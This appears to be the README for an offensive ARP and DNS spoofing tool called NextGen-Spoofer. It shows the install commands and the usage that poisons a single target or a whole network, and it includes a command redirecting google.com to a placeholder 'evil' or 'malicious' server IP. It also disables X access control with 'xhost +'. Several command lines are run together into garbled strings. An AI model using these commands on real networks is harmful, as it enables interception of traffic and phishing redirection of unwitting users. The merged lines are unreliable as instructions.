Recommanded to run it on Debian / Kali
apt-get update
# Prerequisites
sudo apt-get install build-essential python3-dev libnetfilter-queue-dev python3-tk python3-venv -y
git clone https://github.com/saladandonionrings/NextGen-Spoofer.git
python3 -m venv venv
source venv/bin/activate
cd NextGen-Spoofer
pip install -r requirements.txt
# if errors with Netfilterqueue, use this (works perfectly for debian/kali) :
sudo pip3 install --upgrade -U git+https://github.com/kti/python-netfilterqueuepython arp_spoof_nxgenspf.py [-s] [-a]
# [-s] : single target
# [-a] : all network is targeted# you can run it as root or non-root user
xhost +
python3 nextgen_spoofer.pyarp_all.mp4
python dns_spoof_nxgenspf.py -d google.com -s $evil_server_ipDNS NAME = google.com
DNS @IP = $malicious_server_ip





